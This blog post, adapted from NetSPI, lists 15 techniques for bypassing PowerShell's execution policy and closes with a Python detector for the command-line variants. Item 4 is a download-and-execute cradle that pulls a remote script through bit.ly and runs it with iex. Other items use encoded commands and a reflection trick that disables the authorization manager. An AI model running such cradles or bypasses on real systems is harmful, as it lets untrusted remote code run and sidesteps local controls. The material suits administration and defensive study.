15 Ways to Bypass the PowerShell Execution Policy
What is the PowerShell Execution Policy?
The execution policy determines what type of PowerShell scripts (if any) can run. By default it is set to Restricted, which blocks all scripts. It is meant to prevent accidental execution, not to act as a true security control, which is why it is easy to bypass.
Why Bypass It?
- PowerShell is native to Windows
- Maintaining a server that requires .PS1 scripts created by another organization
- Can interact with the Windows API
- Can run in memory (no disk writes)
- Often trusted by whitelisting tools
- Used in many open-source pentest frameworks
View Current Execution Policy

    Get-ExecutionPolicy
    Get-ExecutionPolicy -List | Format-Table -AutoSize

Test Script Example

    Write-Host "My voice is my passport, verify me."
---
15 Ways to Bypass Execution Policy

1. Paste in Interactive Console
   Directly run the script in PowerShell. No config changes or file writes.

2. Echo to PowerShell

       echo Write-Host "My voice is my passport" | powershell -noprofile -

3. Pipe File via Type/Get-Content

       Get-Content .\runme.ps1 | powershell -noprofile -
       type .\runme.ps1 | powershell -noprofile -

4. Download + Invoke-Expression

       powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use -Command Switch

       powershell -command "Write-Host 'Hello'"

6. Use -EncodedCommand

       $cmd = "Write-Host 'Hello'"
       $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
       [Convert]::ToBase64String($bytes)

   Then run with:

       powershell -EncodedCommand <base64>

7. Invoke-Command

       Invoke-Command -ScriptBlock {Write-Host "Hello"}

   Can also pull the policy from a remote host:

       Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force

8. Invoke-Expression (iex)

       Get-Content .\runme.ps1 | Invoke-Expression

   or

       gc .\runme.ps1 | iex

9. Use -ExecutionPolicy Bypass

       powershell -ExecutionPolicy Bypass -File .\runme.ps1

10. Use -ExecutionPolicy Unrestricted

       powershell -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use -ExecutionPolicy RemoteSigned

       powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Swap AuthorizationManager (Temporary)

       function Disable-ExecutionPolicy {
           ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
       }
       Disable-ExecutionPolicy

13. Set Policy for Process
   Only for this session.

       Set-ExecutionPolicy Bypass -Scope Process

14. Set Policy for Current User

       Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. Edit Registry for Current User
   Modify:

       HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

   Add/modify string value:

       ExecutionPolicy = Unrestricted
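A defender-side check for the command-line techniques in the list, added here as an example in Python that is not part of the original post or the NetSPI article: it inspects one process-creation command line for an -ExecutionPolicy override, for a script fed on stdin, decodes an -EncodedCommand (the UTF-16LE plus base64 transform shown in item 6) and flags a download cradle paired with Invoke-Expression, including one hidden inside the encoded command. The sample command lines are constructed; the shortened switch names (-ep, -e, -enc) follow powershell.exe's prefix matching of parameter names.

```python
import base64
import re

# Tokenizer for a Windows command line: a double-quoted span becomes one token.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# Download cradle and Invoke-Expression patterns (items 4 and 8 in the list).
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
IEX = re.compile(r"\biex\b|invoke-expression", re.I)


def tokenize(cmdline):
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN.finditer(cmdline)]


def encode_command(script):
    """Same transform as the -EncodedCommand step: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse of encode_command; returns None when the value is not valid."""
    if not b64:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell_cmdline(cmdline):
    """Flag the command-line bypasses from the list in one process-creation record.
    powershell.exe accepts shortened switch names (-ep/-ex, -e/-ec/-enc), so
    switches are matched as prefixes of the full parameter name."""
    tokens = tokenize(cmdline)
    result = {"execution_policy": None, "encoded_command": None,
              "stdin_script": False, "download_cradle": False}
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if low == "-":                     # "type runme.ps1 | powershell -": script on stdin
            result["stdin_script"] = True
        elif low[:1] in ("-", "/"):
            name = low[1:]
            if name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name)):
                result["execution_policy"] = nxt
            elif name == "ec" or (len(name) >= 1 and "encodedcommand".startswith(name)):
                result["encoded_command"] = decode_encoded_command(nxt)
    # A cradle can sit inside the encoded command, so scan the decoded text as well.
    text = cmdline + " " + (result["encoded_command"] or "")
    result["download_cradle"] = bool(DOWNLOAD.search(text) and IEX.search(text))
    return result
```

Feed it the command line from a process-creation event (Windows Security 4688 or Sysmon 1); the registry and Set-ExecutionPolicy items are not visible on a command line and need script block or registry auditing instead.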
---
Wrap Up
PowerShell's execution policy is a soft restriction, not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate automation, testing, and administration.
Adapted from NetSPI: original blog post